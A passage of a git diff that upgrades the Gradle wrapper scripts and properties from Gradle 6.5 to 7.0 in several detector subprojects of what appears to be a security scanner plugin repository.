echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/apache_nifi_api/gradlew.bat b/google/detectors/exposedui/apache_nifi_api/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/apache_nifi_api/gradlew.bat +++ b/google/detectors/exposedui/apache_nifi_api/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/argoworkflow/gradlew b/google/detectors/exposedui/argoworkflow/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/argoworkflow/gradlew +++ b/google/detectors/exposedui/argoworkflow/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/argoworkflow/gradlew.bat b/google/detectors/exposedui/argoworkflow/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/argoworkflow/gradlew.bat +++ b/google/detectors/exposedui/argoworkflow/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/docker/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists 
diff --git a/google/detectors/exposedui/docker/gradlew b/google/detectors/exposedui/docker/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/docker/gradlew +++ b/google/detectors/exposedui/docker/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 